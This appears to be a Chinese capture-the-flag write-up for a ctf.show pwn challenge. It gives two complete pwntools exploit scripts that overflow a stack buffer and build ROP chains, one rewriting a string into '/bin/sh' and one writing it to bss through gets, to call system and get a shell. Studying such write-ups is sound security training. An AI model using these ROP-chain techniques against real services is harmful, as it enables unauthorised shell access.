0x00 第一种方法

查找字符串发现了可疑的/bin/ti

ROPgadget --binary pwn --string "ti"

获得ti的位置:

Strings information
============================================================
0x000000000060104d : ti

有可以利用的函数look_here,让其ascii-1:

_BYTE *__fastcall look_here(_BYTE *a1)
{
  _BYTE *result; // rax
  int i; // [rsp+14h] [rbp-4h]

  for ( i = 0; i <= 1; ++i )
  {
    result = a1;
    --*a1++;
  }
  return result;
}

exp,结尾需要平衡栈:

from pwn import *
from LibcSearcher import *

elf = ELF('./pwn')

local = 1
if local == 1:
    io = process('./pwn')
else:
    io = remote('pwn.challenge.ctf.show',28133)

system_addr = elf.symbols['system']
pop_rdi_ret = 0x0000000000400733
ti = 0x000000000060104d
binsh = 0x601048
lookhere = 0x40062D
ret = 0x00000000004004d1
payload = 'a'*0x2A0+p64(0xdeadbeef)+p64(pop_rdi_ret)+p64(ti)+p64(lookhere)+p64(pop_rdi_ret)+p64(binsh)+p64(ret)+p64(system_addr)
io.sendline(payload)


io.interactive()

0x01 第二种方法

不需要使用函数look_here,因为题中给了get函数,利用它写一个“/bin/sh”即可。

需要把“/bin/sh”写入bss段中:

from pwn import *
from LibcSearcher import *

elf = ELF('./pwn')

local = 0
if local == 1:
    io = process('./pwn')
    #gdb.attach(io,'b * 0x04006B2')
else:
    io = remote('pwn.challenge.ctf.show',28133)

system_addr = elf.symbols['system']
gets_addr = elf.symbols['gets']
bss = 0x00601800
binsh = 0x601048
ret = 0x00000000004004d1
pop_rdi_ret = 0x0000000000400733

payload = 'a'*0x2A0+p64(0xdeadbeef)+p64(pop_rdi_ret)+p64(bss)+p64(gets_addr)+p64(pop_rdi_ret)+p64(bss)+p64(ret)+p64(system_addr)
io.sendline(payload)
io.sendline('/bin/sh')

io.interactive()